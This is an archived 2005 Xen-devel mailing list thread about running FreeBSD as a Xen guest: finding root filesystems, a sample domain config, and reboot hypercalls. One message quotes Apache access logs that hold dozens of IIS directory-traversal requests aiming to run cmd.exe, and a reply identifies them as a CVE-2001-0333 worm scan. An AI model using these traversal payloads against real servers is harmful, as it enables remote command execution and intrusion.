Mark Williamson
2005-Apr-10 20:37 UTC
Re: [Xen-devel] http://www.fsmware.com/xenofreebsd/ dead?
> The current version of xenofreebsd has, to the best of my knowledge, > fixes for all those bugs. Let me know if you still have problems. I > don''t know any way to make "reboot" work from inside the guest.I''m not sure I quite understood what you meant, so apologies if this is old news to you. From the arch reboot code, you can call: HYPERVISOR_sched_op(SCHEDOP_shutdown | (SHUTDOWN_reboot << SCHEDOP_reasonshift)) Which will cause Xend to destroy your domain and then rebuild it. Similarly, you can notify when you want to halt and when you want to explicitly crash. Cheers, Mark> > "xm shutdown freebsd" does nothing, > > but this is a missing feature, not a bug, right? > > More of a missing feature. I''ve never wanted "xm shutdown", so I never > thought about it. > > > I hope i manage to compile a more recent xenofreebsd kernel before it > > crashes again ;) > > I don''t have 2.0.5 tree, otherwise I''d build you one. > > -Kip > > > /nils. > > > > ps: anybody got a _simple_ /etc/xen/freebsd? This works for me - more > > or less: > > > > kernel = "/boot/xenU/freebsd-5.3-xendemo-2.0.5" > > memory = 64 > > name = "freebsd" > > nics = 1 > > vif = [ ''mac=FE:FD:00:DE:AD:11'' ] > > disk = [ ''file:/home/xen/images/freebsd-5.3- > > xendemo-2.0.5.test.slice,hda1,w'' ] > > extra = ",vfs.root.mountfrom=ufs:/dev/xbd0a" > > restart = ''onreboot'' > > > > > > _______________________________________________ > > Xen-devel mailing list > > Xen-devel@lists.xensource.com > > http://lists.xensource.com/xen-devel > > _______________________________________________ > Xen-devel mailing list > Xen-devel@lists.xensource.com > http://lists.xensource.com/xen-devel_______________________________________________ Xen-devel mailing list Xen-devel@lists.xensource.com http://lists.xensource.com/xen-devel
Nils Toedtmann
2005-Apr-11 12:07 UTC
[Xen-devel] http://www.fsmware.com/xenofreebsd/ dead?
Just wanted to try domU freebsd and found <http://216.239.59.104/search?q=cache:M_4r1b-RG- EJ:www.fsmware.com/xenofreebsd/5.3/xenbsdsetup.txt&hl=en&lr=&strip=1> but the webservice on www.fsmware.com seems to be down/unavailable. Any mirror? Or other working FreeBSD domU-kernels & images? Regards, /nils. _______________________________________________ Xen-devel mailing list Xen-devel@lists.xensource.com http://lists.xensource.com/xen-devel
> Just wanted to try domU freebsd and found > > <http://216.239.59.104/search?q=cache:M_4r1b-RG- > EJ:www.fsmware.com/xenofreebsd/5.3/xenbsdsetup.txt&hl=en&lr=&strip=1> > > but the webservice on www.fsmware.com seems to be > down/unavailable. Any mirror? Or other working FreeBSD > domU-kernels & images?The freebsd 5.3 sparse tree is now in the main Xen repository, though I expect updates may be available on fsmware ahead of time. Ian _______________________________________________ Xen-devel mailing list Xen-devel@lists.xensource.com http://lists.xensource.com/xen-devel
Mark Williamson
2005-Apr-11 12:43 UTC
Re: [Xen-devel] http://www.fsmware.com/xenofreebsd/ dead?
As an aside, the Debian kFreeBSD project (http://www.debian.org/ports/kfreebsd-gnu/ yes, thats Debian on top of FreeBSD''s kernel) supply a Xenified BSD kernel image in their apt repository. It''s possible to build a root filesystem for from a Linux dom0 using the Crosshurd tool (http://packages.debian.org/unstable/misc/crosshurd). This tool can also be used to build Debian kNetBSD root filesystems and to build Linux root filesystems (it can also build Hurd filesystems but that won''t run on Xen). Of course this doesn''t help you get a "normal" BSD system up and running. It might be fun to play with though. Cheers, Mark On Monday 11 April 2005 13:53, Nils Toedtmann wrote:> Am Montag, den 11.04.2005, 13:18 +0100 schrieb Ian Pratt: > > > Just wanted to try domU freebsd and found > > > > > > <http://216.239.59.104/search?q=cache:M_4r1b-RG- > > > EJ:www.fsmware.com/xenofreebsd/5.3/xenbsdsetup.txt&hl=en&lr=&strip=1> > > > > > > but the webservice on www.fsmware.com seems to be > > > down/unavailable. Any mirror? Or other working FreeBSD > > > domU-kernels & images? > > > > The freebsd 5.3 sparse tree is now in the main Xen repository, though I > > expect updates may be available on fsmware ahead of time. > > I know, but i have no freebsd system to bootstrap from, so i''m looking > for a ready-to-go rootfilesystem. I think once there has been a > > <http://www.fsmware.com/xenofreebsd/5.3/mdroot-5.3-small.gz> > > or something like that. > > /nils. > > > _______________________________________________ > Xen-devel mailing list > Xen-devel@lists.xensource.com > http://lists.xensource.com/xen-devel_______________________________________________ Xen-devel mailing list Xen-devel@lists.xensource.com http://lists.xensource.com/xen-devel
Nils Toedtmann
2005-Apr-11 12:53 UTC
RE: [Xen-devel] http://www.fsmware.com/xenofreebsd/ dead?
Am Montag, den 11.04.2005, 13:18 +0100 schrieb Ian Pratt:> > Just wanted to try domU freebsd and found > > > > <http://216.239.59.104/search?q=cache:M_4r1b-RG- > > EJ:www.fsmware.com/xenofreebsd/5.3/xenbsdsetup.txt&hl=en&lr=&strip=1> > > > > but the webservice on www.fsmware.com seems to be > > down/unavailable. Any mirror? Or other working FreeBSD > > domU-kernels & images? > > The freebsd 5.3 sparse tree is now in the main Xen repository, though I > expect updates may be available on fsmware ahead of time.I know, but i have no freebsd system to bootstrap from, so i''m looking for a ready-to-go rootfilesystem. I think once there has been a <http://www.fsmware.com/xenofreebsd/5.3/mdroot-5.3-small.gz> or something like that. /nils. _______________________________________________ Xen-devel mailing list Xen-devel@lists.xensource.com http://lists.xensource.com/xen-devel
> I know, but i have no freebsd system to bootstrap from, so > i''m looking for a ready-to-go rootfilesystem. I think once > there has been a > > <http://www.fsmware.com/xenofreebsd/5.3/mdroot-5.3-small.gz> > > or something like that.The demo CD has a FreeBSD root filesystem on it, along with a NetBSD and Debian Linux one too. I guess you could use this, until Kip get''s fsmware back up. Ian _______________________________________________ Xen-devel mailing list Xen-devel@lists.xensource.com http://lists.xensource.com/xen-devel
Sorry. Apache periodically stops working. I just restarted it. -Kip On Apr 11, 2005 5:07 AM, Nils Toedtmann <xen-devel@nils.toedtmann.net> wrote:> Just wanted to try domU freebsd and found > > <http://216.239.59.104/search?q=cache:M_4r1b-RG- > EJ:www.fsmware.com/xenofreebsd/5.3/xenbsdsetup.txt&hl=en&lr=&strip=1> > > but the webservice on www.fsmware.com seems to be down/unavailable. Any > mirror? Or other working FreeBSD domU-kernels & images? > > Regards, /nils. > > _______________________________________________ > Xen-devel mailing list > Xen-devel@lists.xensource.com > http://lists.xensource.com/xen-devel >_______________________________________________ Xen-devel mailing list Xen-devel@lists.xensource.com http://lists.xensource.com/xen-devel
It looks as if someone was trying to do something inappropriate and Apache choked. -Kip 69.240.141.47 - - [07/Apr/2005:05:52:28 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-" 69.240.141.47 - - [07/Apr/2005:05:52:29 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-" 69.240.141.47 - - [07/Apr/2005:05:52:29 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-" 69.240.141.47 - - [07/Apr/2005:05:52:29 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-" 69.240.141.47 - - [07/Apr/2005:05:52:29 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-" "-" 69.240.141.47 - - [07/Apr/2005:05:52:30 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-" "-" 69.240.141.47 - - [07/Apr/2005:05:52:30 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-" 69.240.141.47 - - [07/Apr/2005:05:52:30 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-" 69.37.157.224 - - [08/Apr/2005:01:27:06 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-" 69.37.157.224 - - [08/Apr/2005:01:27:06 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-" 69.37.157.224 - - [08/Apr/2005:01:27:07 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-" 69.37.157.224 - - [08/Apr/2005:01:27:07 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-" 69.37.157.224 - - [08/Apr/2005:01:27:07 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-" 69.37.157.224 - - [08/Apr/2005:01:27:08 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338 "-" "-" 69.37.157.224 - - [08/Apr/2005:01:27:08 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-" 69.37.157.224 - - [08/Apr/2005:01:27:08 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-" 69.37.157.224 - - [08/Apr/2005:01:27:09 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-" 69.37.157.224 - - [08/Apr/2005:01:27:09 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-" 69.37.157.224 - - [08/Apr/2005:01:27:09 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-" "-" 69.37.157.224 - - [08/Apr/2005:01:27:10 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-" "-" 69.37.157.224 - - [08/Apr/2005:01:27:10 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-" 69.37.157.224 - - [08/Apr/2005:01:27:10 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-" 69.136.95.2 - - [08/Apr/2005:04:22:07 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-" 69.136.95.2 - - [08/Apr/2005:04:22:07 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-" 69.136.95.2 - - [08/Apr/2005:04:22:07 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-" 69.136.95.2 - - [08/Apr/2005:04:22:08 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-" 69.136.95.2 - - [08/Apr/2005:04:22:08 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-" 69.136.95.2 - - [08/Apr/2005:04:22:08 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338 "-" "-" 69.136.95.2 - - [08/Apr/2005:04:22:08 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-" 69.136.95.2 - - [08/Apr/2005:04:22:08 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-" 69.136.95.2 - - [08/Apr/2005:04:22:09 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-" 69.136.95.2 - - [08/Apr/2005:04:22:09 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-" 69.136.95.2 - - [08/Apr/2005:04:22:09 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-" "-" 69.136.95.2 - - [08/Apr/2005:04:22:09 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-" "-" 69.136.95.2 - - [08/Apr/2005:04:22:10 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-" 69.136.95.2 - - [08/Apr/2005:04:22:10 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-" On Apr 11, 2005 10:34 AM, Kip Macy <kip.macy@gmail.com> wrote:> Sorry. Apache periodically stops working. I just restarted it. > > -Kip > > On Apr 11, 2005 5:07 AM, Nils Toedtmann <xen-devel@nils.toedtmann.net> wrote: > > Just wanted to try domU freebsd and found > > > > <http://216.239.59.104/search?q=cache:M_4r1b-RG- > > EJ:www.fsmware.com/xenofreebsd/5.3/xenbsdsetup.txt&hl=en&lr=&strip=1> > > > > but the webservice on www.fsmware.com seems to be down/unavailable. Any > > mirror? Or other working FreeBSD domU-kernels & images? > > > > Regards, /nils. > > > > _______________________________________________ > > Xen-devel mailing list > > Xen-devel@lists.xensource.com > > http://lists.xensource.com/xen-devel > > >_______________________________________________ Xen-devel mailing list Xen-devel@lists.xensource.com http://lists.xensource.com/xen-devel
Nils Toedtmann
2005-Apr-11 19:40 UTC
RE: [Xen-devel] http://www.fsmware.com/xenofreebsd/ dead?
Am Montag, den 11.04.2005, 13:58 +0100 schrieb Ian Pratt:> > I know, but i have no freebsd system to bootstrap from, so > > i''m looking for a ready-to-go rootfilesystem. I think once > > there has been a > > > > <http://www.fsmware.com/xenofreebsd/5.3/mdroot-5.3-small.gz> > > > > or something like that. > > The demo CD has a FreeBSD root filesystem on it, along with a NetBSD and > Debian Linux one too. I guess you could use this, until Kip get''s > fsmware back up.Great, got it up & running 1h after i got your mail, worked out-of-the- box! I love this list :) While playing around with it, i realized that the demo xenofreebsd kernel is very instable (segfaulting csh; hole system goes to lunch while "xm list" thinks it''s still running). And btw: "reboot" does not work from inside (it just halts) and "xm shutdown freebsd" does nothing, but this is a missing feature, not a bug, right? I hope i manage to compile a more recent xenofreebsd kernel before it crashes again ;) /nils. ps: anybody got a _simple_ /etc/xen/freebsd? This works for me - more or less: kernel = "/boot/xenU/freebsd-5.3-xendemo-2.0.5" memory = 64 name = "freebsd" nics = 1 vif = [ ''mac=FE:FD:00:DE:AD:11'' ] disk = [ ''file:/home/xen/images/freebsd-5.3- xendemo-2.0.5.test.slice,hda1,w'' ] extra = ",vfs.root.mountfrom=ufs:/dev/xbd0a" restart = ''onreboot'' _______________________________________________ Xen-devel mailing list Xen-devel@lists.xensource.com http://lists.xensource.com/xen-devel
Nils Toedtmann
2005-Apr-11 20:20 UTC
Re: [Xen-devel] http://www.fsmware.com/xenofreebsd/ dead?
Am Montag, den 11.04.2005, 10:39 -0700 schrieb Kip Macy:> It looks as if someone was trying to do something inappropriate and > Apache choked. > > > -Kip > > 69.240.141.47 - - [07/Apr/2005:05:52:28 -0700] "GET > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 > "-" "-"[...] Some worm or virus exploiting MS-IIS "double decoding directory traversal" (CVE-2001-0333), probably good old nimda. See <http://www.iss.net/security_center/advice/Intrusions/2000645/default.htm> Should not bother apache at all, i doubt this is responsible for the oops. /nils.> On Apr 11, 2005 10:34 AM, Kip Macy <kip.macy@gmail.com> wrote: > > Sorry. Apache periodically stops working. I just restarted it. > > > > -Kip > > > > On Apr 11, 2005 5:07 AM, Nils Toedtmann <xen-devel@nils.toedtmann.net> wrote: > > > Just wanted to try domU freebsd and found > > > > > > <http://216.239.59.104/search?q=cache:M_4r1b-RG- > > > EJ:www.fsmware.com/xenofreebsd/5.3/xenbsdsetup.txt&hl=en&lr=&strip=1> > > > > > > but the webservice on www.fsmware.com seems to be down/unavailable. Any > > > mirror? Or other working FreeBSD domU-kernels & images?[...] _______________________________________________ Xen-devel mailing list Xen-devel@lists.xensource.com http://lists.xensource.com/xen-devel
> While playing around with it, i realized that the demo xenofreebsd > kernel is very instable (segfaulting csh; hole system goes to lunch > while "xm list" thinks it''s still running). And btw: "reboot" does not > work from inside (it just halts) andThe current version of xenofreebsd has, to the best of my knowledge, fixes for all those bugs. Let me know if you still have problems. I don''t know any way to make "reboot" work from inside the guest.> "xm shutdown freebsd" does nothing, > but this is a missing feature, not a bug, right?More of a missing feature. I''ve never wanted "xm shutdown", so I never thought about it.> > I hope i manage to compile a more recent xenofreebsd kernel before it > crashes again ;)I don''t have 2.0.5 tree, otherwise I''d build you one. -Kip> > /nils. > > ps: anybody got a _simple_ /etc/xen/freebsd? This works for me - more > or less: > > kernel = "/boot/xenU/freebsd-5.3-xendemo-2.0.5" > memory = 64 > name = "freebsd" > nics = 1 > vif = [ ''mac=FE:FD:00:DE:AD:11'' ] > disk = [ ''file:/home/xen/images/freebsd-5.3- > xendemo-2.0.5.test.slice,hda1,w'' ] > extra = ",vfs.root.mountfrom=ufs:/dev/xbd0a" > restart = ''onreboot'' > > > _______________________________________________ > Xen-devel mailing list > Xen-devel@lists.xensource.com > http://lists.xensource.com/xen-devel >_______________________________________________ Xen-devel mailing list Xen-devel@lists.xensource.com http://lists.xensource.com/xen-devel